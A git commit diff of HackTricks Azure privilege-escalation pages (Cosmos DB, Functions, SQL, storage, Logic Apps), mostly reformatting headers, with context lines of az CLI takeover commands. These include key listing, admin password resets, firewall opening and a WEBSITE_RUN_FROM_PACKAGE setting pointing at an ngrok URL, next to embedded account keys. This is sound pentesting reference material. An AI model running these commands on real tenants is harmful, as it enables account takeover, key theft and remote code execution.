gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-31 23:15:48 -08:00
Code Issues Packages Projects Releases Wiki Activity

Y

Browse Source
This commit is contained in:
Jimmy
2025-02-10 12:22:24 +01:00
parent 3f01e5e4fa
commit 3757efbd43
34 changed files with 238 additions and 387 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
src/pentesting-cloud/azure-security/az-privilege-escalation/az-cosmosDB-privesc.md
View File

@@ -5,15 +5,14 @@
## CosmosDB Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-cosmosDB.md" %}
[az-cosmosDB.md](../az-services/az-cosmosDB.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-cosmosDB.md
{{#endref}}
### ("Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read") & ("Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read")
### (`Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read`) & (`Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write`, `Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read`)
With this permissions you can priviledge scalate giving a user the pemrissions to execute queries and connect to the database. First a definition role is created giving the necesary permissions and scopes.
{% code overflow="wrap" %}
```bash
az cosmosdb sql role definition create \
--account-name <account_name> \
@@ -36,11 +35,9 @@ az cosmosdb sql role definition create \
]
}'
```
{% endcode %}
After that the assigment of the definition is given to a user. After this that user can use the DefaultAzureCredential() connection method to execute queries.
{% code overflow="wrap" %}
```bash
az cosmosdb sql role assignment create \
--account-name <account_name> \
@@ -49,19 +46,16 @@ az cosmosdb sql role assignment create \
--principal-id <principal_id-togive-perms> \
--scope "/"
```
{% endcode %}
### "Microsoft.DocumentDB/databaseAccounts/listKeys/action"
### `Microsoft.DocumentDB/databaseAccounts/listKeys/action`
With this permission, you can retrieve the primary and secondary keys for an Azure Cosmos DB account. These keys provide full access to the database account and its resources, enabling actions such as data reads, writes, and configuration changes.
{% code overflow="wrap" %}
```bash
az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

28
src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md
View File

@@ -126,7 +126,7 @@ az storage blob upload \
--overwrite
```
### Microsoft.Web/sites/host/listkeys/action
### `Microsoft.Web/sites/host/listkeys/action`
This permission allows to list the function, master and system keys, but not the host one, of the specified function with:
@@ -159,7 +159,7 @@ curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwro
-v
```
### Microsoft.Web/sites/functions/listKeys/action
### `Microsoft.Web/sites/functions/listKeys/action`
This permission allows to get the host key, of the specified function with:
@@ -167,7 +167,7 @@ This permission allows to get the host key, of the specified function with:
az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"
```
### Microsoft.Web/sites/host/functionKeys/write
### `Microsoft.Web/sites/host/functionKeys/write`
This permission allows to create/update a function key of the specified function with:
@@ -175,7 +175,7 @@ This permission allows to create/update a function key of the specified function
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```
### Microsoft.Web/sites/host/masterKey/write
### `Microsoft.Web/sites/host/masterKey/write`
This permission allows to create/update a master key to the specified function with:
@@ -186,7 +186,7 @@ az functionapp keys set --resource-group <res_group> --key-name <key-name> --key
> [!CAUTION]
> Remember that with this key you can also access the source code and modify it as explained before!
### Microsoft.Web/sites/host/systemKeys/write
### `Microsoft.Web/sites/host/systemKeys/write`
This permission allows to create/update a system function key to the specified function with:
@@ -194,7 +194,7 @@ This permission allows to create/update a system function key to the specified f
az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==
```
### Microsoft.Web/sites/config/list/action
### `Microsoft.Web/sites/config/list/action`
This permission allows to get the settings of a function. Inside these configurations it might be possible to find the default values **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which contains an **account key to access the blob storage of the function with FULL permissions**.
@@ -209,7 +209,7 @@ az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/publishingcredentials/list?api-version=2018-11-01"
```
### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write
### `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/write`
These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located.
@@ -247,7 +247,7 @@ az rest --method PUT \
--body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}'
```
### Microsoft.Web/sites/hostruntime/vfs/write
### `Microsoft.Web/sites/hostruntime/vfs/write`
With this permission it's **possible to modify the code of an application** through the web console (or through the following API endpoint):
@@ -260,7 +260,7 @@ az rest --method PUT \
--body @/tmp/body
```
### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)
### `Microsoft.Web/sites/publishxml/action`, (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write`)
This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**:
@@ -345,7 +345,7 @@ put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and depl
_Note that the **FTP username** is usually in the format \<app-name>\\$\<app-name>._
### Microsoft.Web/sites/hostruntime/vfs/read
### `Microsoft.Web/sites/hostruntime/vfs/read`
This permission allows to **read the source code** of the app through the VFS:
@@ -353,7 +353,7 @@ This permission allows to **read the source code** of the app through the VFS:
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
### Microsoft.Web/sites/functions/token/action
### `Microsoft.Web/sites/functions/token/action`
With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code.
@@ -369,7 +369,7 @@ curl "https://<app-name>.azurewebsites.net/admin/host/systemkeys/_master" \
-H "Authorization: Bearer <token>"
```
### Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read)
### `Microsoft.Web/sites/config/write`, (`Microsoft.Web/sites/functions/properties/read`)
This permissions allows to **enable functions** that might be disabled (or disable them).
@@ -387,7 +387,7 @@ It's also possible to see if a function is enabled or disabled in the following
az rest --url "https://management.azure.com/subscriptions/<subscripntion-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/functions/<func-name>/properties/state?api-version=2024-04-01"
```
### Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read)
### `Microsoft.Web/sites/config/write`, `Microsoft.Web/sites/config/list/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/read`)
With these permissions it's possible to **modify the container run by a function app** configured to run a container. This would allow an attacker to upload a malicious azure function container app to docker hub (for example) and make the function execute it.
@@ -397,7 +397,7 @@ az functionapp config container set --name <app-name> \
--image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0"
```
### Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read)
### `Microsoft.Web/sites/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`, (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/operationresults/read`)
With these permissions it's possible to **attach a new user managed identity to a function**. If the function was compromised this would allow to escalate privileges to any user managed identity.

2
src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
View File

@@ -10,7 +10,7 @@ For more information about this service check:
../az-services/az-keyvault.md
{{#endref}}
### Microsoft.KeyVault/vaults/write
### `Microsoft.KeyVault/vaults/write`
An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC).

14
src/pentesting-cloud/azure-security/az-privilege-escalation/az-logic-apps-privesc.md
View File

@@ -5,15 +5,14 @@
## Logic Apps Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-logic-apps.md" %}
[az-logic-apps.md](../az-services/az-logic-apps.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-logic-apps.md
{{#endref}}
### ("Microsoft.Resources/subscriptions/resourcegroups/read", "Microsoft.Logic/workflows/read", "Microsoft.Logic/workflows/write" && "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action") && ("Microsoft.Logic/workflows/triggers/run/action")
### (`Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.Logic/workflows/read`, `Microsoft.Logic/workflows/write` && `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`) && (`Microsoft.Logic/workflows/triggers/run/action`)
With this permission, you can create or update, Azure Logic Apps workflows. Workflows define automated processes and integrations between various systems and services.
{% code overflow="wrap" %}
```bash
az logic workflow create \
--resource-group <resource_group_name> \
@@ -26,7 +25,6 @@ az logic workflow update \
--resource-group logicappgroup \
--definition <workflow_definition_file.json>
```
{% endcode %}
And after changing it, you can run it with:
@@ -38,17 +36,15 @@ az rest \
--headers "Content-Type=application/json"
```
### ("Microsoft.Web/sites/read", "Microsoft.Web/sites/basicPublishingCredentialsPolicies/read", "Microsoft.Web/sites/write", "Microsoft.Web/sites/config/list/action") && ("Microsoft.Web/sites/start/action")
### (`Microsoft.Web/sites/read`, `Microsoft.Web/sites/basicPublishingCredentialsPolicies/read`, `Microsoft.Web/sites/write`, `Microsoft.Web/sites/config/list/action`) && (`Microsoft.Web/sites/start/action`)
With these permissions, you can deploy, Logic App workflows using ZIP file deployments. These permissions enable actions such as reading app details, accessing publishing credentials, writing changes, and listing app configurations. Alongside the start permissions you can update and deploy a new Logic App with the content desired
{% code overflow="wrap" %}
```bash
az logicapp deployment source config-zip \
--name <logic_app_name> \
--resource-group <resource_group_name> \
--src <path_to_zip_file>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

19
src/pentesting-cloud/azure-security/az-privilege-escalation/az-mysql-privesc.md
View File

@@ -2,19 +2,17 @@
{{#include ../../../banners/hacktricks-training.md}}
## MySQL Database Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-mysql.md" %}
[az-mysql.md](../az-services/az-mysql.md)
{% endcontent-ref %}
{{#ref}}
../az-services/az-mysql.md
{{#endref}}
### ""Microsoft.DBforMySQL/flexibleServers/read" && "Microsoft.DBforMySQL/flexibleServers/write"
### `Microsoft.DBforMySQL/flexibleServers/read` && `Microsoft.DBforMySQL/flexibleServers/write`
With this permission, you can create, update, or delete MySQL Flexible Server instances on Azure. This includes provisioning new servers, modifying existing server configurations, or decommissioning servers.
{% code overflow="wrap" %}
```bash
az mysql flexible-server create \
--name <ServerName> \
@@ -27,32 +25,26 @@ az mysql flexible-server create \
--tier <PricingTier> \
--version <MySQLVersion>
```
{% endcode %}
For example, this permissions allow changing the MySQL password, usefull of course in case that MySQL authentication is enabled.
{% code overflow="wrap" %}
```bash
az mysql flexible-server update \
--resource-group <resource_group_name> \
--name <server_name> \
--admin-password <password_to_update>
```
{% endcode %}
Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
{% code overflow="wrap" %}
```bash
az mysql flexible-server update --resource-group <resource_group_name> --server-name <server_name> --public-access Enabled
```
{% endcode %}
### ""Microsoft.DBforMySQL/flexibleServers/read", "Microsoft.DBforMySQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforMySQL/flexibleServers/administrators/write" && "Microsoft.DBforMySQL/flexibleServers/administrators/read""
### `Microsoft.DBforMySQL/flexibleServers/read`, `Microsoft.DBforMySQL/flexibleServers/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.DBforMySQL/flexibleServers/administrators/write` && `Microsoft.DBforMySQL/flexibleServers/administrators/read`
With this permission, you can configure Azure Active Directory (AD) administrators for a MySQL Flexible Server. This can be exploited by setting oneself or another account as the AD administrator, granting full administrative control over the MySQL server. It's important that the flexible-server has a user assigned managed identities to use.
{% code overflow="wrap" %}
```bash
az mysql flexible-server ad-admin create \
--resource-group <ResourceGroupName> \
@@ -61,7 +53,6 @@ az mysql flexible-server ad-admin create \
--identity <IdentityNameOrID> \
--object-id <ObjectID>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

16
src/pentesting-cloud/azure-security/az-privilege-escalation/az-postgresql-privesc.md
View File

@@ -5,15 +5,14 @@
## PostgreSQL Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-postgresql.md" %}
{{#ref}}
[az-postgresql.md](../az-services/az-postgresql.md)
{% endcontent-ref %}
{{#endref}}
### "Microsoft.DBforPostgreSQL/flexibleServers/read" && "Microsoft.DBforPostgreSQL/flexibleServers/write"
### `Microsoft.DBforPostgreSQL/flexibleServers/read` && `Microsoft.DBforPostgreSQL/flexibleServers/write`
With this permission, you can create, update, or delete PostgreSQL Flexible Server instances on Azure. This includes provisioning new servers, modifying existing server configurations, or decommissioning servers.
{% code overflow="wrap" %}
```bash
az postgres flexible-server create \
--name <ServerName> \
@@ -26,34 +25,28 @@ az postgres flexible-server create \
--tier <PricingTier> \
--version <PostgreSQLVersion>
```
{% endcode %}
For example, this permissions allow changing the PostgreSQL password, usefull of course in case that PostgreSQL authentication is enabled.
{% code overflow="wrap" %}
```bash
az postgres flexible-server update \
--resource-group <resource_group_name> \
--name <server_name> \
--admin-password <password_to_update>
```
{% endcode %}
Additionally it is necesary to have the public access enabled if you want to access from a non private endpoint, to enable it:
{% code overflow="wrap" %}
```bash
az postgres flexible-server update --resource-group <resource_group_name> --server-name <server_name> --public-access Enabled
```
{% endcode %}
### "Microsoft.DBforPostgreSQL/flexibleServers/read", "Microsoft.DBforPostgreSQL/flexibleServers/write", "Microsoft.ManagedIdentity/userAssignedIdentities/assign/action", "Microsoft.DBforPostgreSQL/flexibleServers/administrators/write" && "Microsoft.DBforPostgreSQL/flexibleServers/administrators/read"
### `Microsoft.DBforPostgreSQL/flexibleServers/read`, `Microsoft.DBforPostgreSQL/flexibleServers/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.DBforPostgreSQL/flexibleServers/administrators/write` && `Microsoft.DBforPostgreSQL/flexibleServers/administrators/read`
With this permission, you can configure Azure Active Directory (AD) administrators for a PostgreSQL Flexible Server. This can be exploited by setting oneself or another account as the AD administrator, granting full administrative control over the PostgreSQL server. Updating existing principal is not supported yet so if there is one created you must delete it first.
It's important that the flexible-server has a user assigned managed identities to use.
{% code overflow="wrap" %}
```bash
az postgres flexible-server ad-admin create \
--resource-group <ResourceGroupName> \
@@ -62,7 +55,6 @@ az postgres flexible-server ad-admin create \
--identity <IdentityNameOrID> \
--object-id <ObjectID>
```
{% endcode %}
{{#include ../../../banners/hacktricks-training.md}}

2
src/pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md
View File

@@ -131,7 +131,7 @@ print("Message Receiving Completed")
print("----------------------------")
```
### `Microsoft.ServiceBus/namespaces/authorizationRules/write` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
### `Microsoft.ServiceBus/namespaces/authorizationRules/read` & `Microsoft.ServiceBus/namespaces/authorizationRules/write`
If you have these permissions, you can escalate privileges by reading or creating shared access keys. These keys allow full control over the Service Bus namespace, including managing queues, topics, and sending/receiving messages, potentially bypassing role-based access controls (RBAC).

10
src/pentesting-cloud/azure-security/az-privilege-escalation/az-sql-privesc.md
View File

@@ -10,7 +10,7 @@ For more information about SQL Database check:
../az-services/az-sql.md
{{#endref}}
### "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/write"
### `Microsoft.Sql/servers/read` && `Microsoft.Sql/servers/write`
With these permissions, a user can perform privilege escalation by updating or creating Azure SQL servers and modifying critical configurations, including administrative credentials. This permission allows the user to update server properties, including the SQL server admin password, enabling unauthorized access or control over the server. They can also create new servers, potentially introducing shadow infrastructure for malicious purposes. This becomes particularly critical in environments where "Microsoft Entra Authentication Only" is disabled, as they can exploit SQL-based authentication to gain unrestricted access.
@@ -39,7 +39,7 @@ az sql server update \
--enable-public-network true
```
### "Microsoft.Sql/servers/firewallRules/write"
### `Microsoft.Sql/servers/firewallRules/write`
An attacker can manipulate firewall rules on Azure SQL servers to allow unauthorized access. This can be exploited to open up the server to specific IP addresses or entire IP ranges, including public IPs, enabling access for malicious actors. This post-exploitation activity can be used to bypass existing network security controls, establish persistence, or facilitate lateral movement within the environment by exposing sensitive resources.
@@ -64,7 +64,7 @@ az sql server firewall-rule update \
Additionally, `Microsoft.Sql/servers/outboundFirewallRules/delete` permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
### ""Microsoft.Sql/servers/ipv6FirewallRules/write"
### `Microsoft.Sql/servers/ipv6FirewallRules/write`
With this permission, you can create, modify, or delete IPv6 firewall rules on an Azure SQL Server. This could enable an attacker or authorized user to bypass existing network security configurations and gain unauthorized access to the server. By adding a rule that allows traffic from any IPv6 address, the attacker could open the server to external access."
@@ -80,7 +80,7 @@ az sql server firewall-rule create \
Additionally, `Microsoft.Sql/servers/ipv6FirewallRules/delete` permission lets you delete a Firewall Rule.
NOTE: It is necesary to have the public access enabled
### "Microsoft.Sql/servers/administrators/write" && "Microsoft.Sql/servers/administrators/read"
### `Microsoft.Sql/servers/administrators/write` && `Microsoft.Sql/servers/administrators/read`
With this permissions you can privesc in an Azure SQL Server environment accessing to SQL databases and retrieven critical information. Using the the command below, an attacker or authorized user can set themselves or another account as the Azure AD administrator. If "Microsoft Entra Authentication Only" is enabled you are albe to access the server and its instances. Here's the command to set the Azure AD administrator for an SQL server:
@@ -92,7 +92,7 @@ az sql server ad-admin create \
--object-id <azure_subscribtion_id>
```
### "Microsoft.Sql/servers/azureADOnlyAuthentications/write" && "Microsoft.Sql/servers/azureADOnlyAuthentications/read"
### `Microsoft.Sql/servers/azureADOnlyAuthentications/write` && `Microsoft.Sql/servers/azureADOnlyAuthentications/read`
With these permissions, you can configure and enforce "Microsoft Entra Authentication Only" on an Azure SQL Server, which could facilitate privilege escalation in certain scenarios. An attacker or an authorized user with these permissions can enable or disable Azure AD-only authentication.

22
src/pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md
View File

@@ -10,7 +10,7 @@ For more information about storage check:
../az-services/az-storage.md
{{#endref}}
### Microsoft.Storage/storageAccounts/listkeys/action
### `Microsoft.Storage/storageAccounts/listkeys/action`
A principal with this permission will be able to list (and the secret values) of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
@@ -18,7 +18,7 @@ A principal with this permission will be able to list (and the secret values) of
az storage account keys list --account-name <acc-name>
```
### Microsoft.Storage/storageAccounts/regenerateKey/action
### `Microsoft.Storage/storageAccounts/regenerateKey/action`
A principal with this permission will be able to renew and get the new secret value of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
@@ -28,7 +28,7 @@ Moreover, in the response, the user will get the value of the renewed key and al
az storage account keys renew --account-name <acc-name> --key key2
```
### Microsoft.Storage/storageAccounts/write
### `Microsoft.Storage/storageAccounts/write`
A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
@@ -42,7 +42,7 @@ az storage account update --name <acc-name> --add networkRuleSet.ipRules value=<
## Blobs Specific privesc
### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete
### `Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write` | `Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete`
The first permission allows to **modify immutability policies** in containers and the second to delete them.
@@ -64,19 +64,19 @@ az storage container immutability-policy update \
## File shares specific privesc
### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action
### `Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action`
This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem.
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action
### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action`
This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem.
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action
### `Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action`
This should allow a user having this permission to be able to perform actions inside a file system as a superuser.
### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
### `Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)`
With this permission, an attacker can create and update (if has `Microsoft.Storage/storageAccounts/localusers/read` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the users permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
@@ -90,7 +90,7 @@ az storage account local-user create \
--has-ssh-key false/true # Depends on the auth method to use
```
### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action
### `Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action`
With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
@@ -108,7 +108,7 @@ sftp <storage-account-name>.<local-user-name>@<storage-account-name>.blob.core.w
#regenerated-password
```
### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
### `Microsoft.Storage/storageAccounts/restoreBlobRanges/action`, `Microsoft.Storage/storageAccounts/blobServices/containers/read`, `Microsoft.Storage/storageAccounts/read` && `Microsoft.Storage/storageAccounts/listKeys/action`
With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
@@ -126,7 +126,7 @@ az storage blob undelete \
--name "fileName.txt"
```
### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read
### `Microsoft.Storage/storageAccounts/fileServices/shares/restore/action` && `Microsoft.Storage/storageAccounts/read`
With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.